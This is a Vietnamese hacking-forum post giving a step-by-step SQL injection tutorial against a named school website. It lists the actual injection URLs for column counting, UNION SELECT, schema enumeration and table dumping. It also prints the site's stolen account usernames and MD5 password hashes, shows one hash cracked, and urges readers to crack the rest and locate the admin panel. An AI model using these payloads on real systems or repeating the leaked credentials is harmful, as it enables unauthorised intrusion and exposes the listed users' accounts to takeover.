SQL injection siêu căn bản

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 7, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  <start tut>
  victim: http://nhanducschool.com/
  b1: kiểm tra xem victim có bị lỗi ko?
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=13'
  => lỗi
  b2: dùng order by để đếm số column
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL order by 7-- (không lỗi)
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL order by 8-- (lỗi)
  => số column là 7.... thay 13 = NULL để show ra nội dung trang trống
  b3: dùng union để show ra column bị lỗi
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,2,3,4,5,6,7--
  => thấy có gì lạ ko? số 2 đó :)
  b4: kiểm tra phiên bản php và database name
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,version(),3,4,5,6,7--
  => php phiên bản 5.1.37-community-log
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,database(),3,4,5,6,7--
  => database name là caring_heart_school
  b5: show ra table name
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
  => ,category,comment,image,news,page,sub_category
  nhìn vào thì có thể đoán table nào chứa id và pass rồi ^^ (account)
  b6: show ra các column trong table account
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=CHAR(97, 99, 99, 111, 117, 110, 116)--
  => acc_id,acc_username,acc_password,acc_email,acc_status,acc_type,acc_phone
  b7: truy vẫn các column để tìm thông tin cần thiết :)
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(acc_username),3,4,5,6,7 from account--
  => 1,123123,3bacon,admin,ange16_9006,angel16_9006,anhkiet67,anhtrung1990,baby,babyjoy,Bao nam,baongoc,baonhi-dn,baonhi2011,bảo nhi,Bảo Trân,beliti,bemamnon,bengia,berom,betyty,bexuka2011,bich ha,bich trang,bichhanh,bimbim6709,Binny Nguyễn,boiking,bonghongnho,cambich,camthu,chan hung,chilly,clear27000,cong,cong
  http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(acc_password),3,4,5,6,7 from account--
  => e10adc3949ba59abbe56e057f20f883e,9c2d17a70d7a37fa59a6cb88d8950b27,8a70ea4066b62962a938b1cd14b144dd,7ededa3884561c2deda30b6d759fad99,2345f353f3230798896129e6e4117945,2345f353f3230798896129e6e4117945,ad7532d5b3860a408fbe01f9455dca36,e10adc3949ba59abbe56e057f20f883e,4297f44b13955235245b2497399d7a93,0ec0ad20df9c357bbf31a5d227046312,26e15f51ca0
  password đã bị mã hóa md5 => phải crack tại các trang crack onl. thử crack đoạn mã này "9c2d17a70d7a37fa59a6cb88d8950b27" tại http://www.md5decrypter.co.uk/ xem
  9c2d17a70d7a37fa59a6cb88d8950b27 = 161413
  => enjoy ^^
  việc còn lại của các bạn là crack tất cả, tìm link admin và ... nữa là xong ^^
  <End tut>
   

Share This Page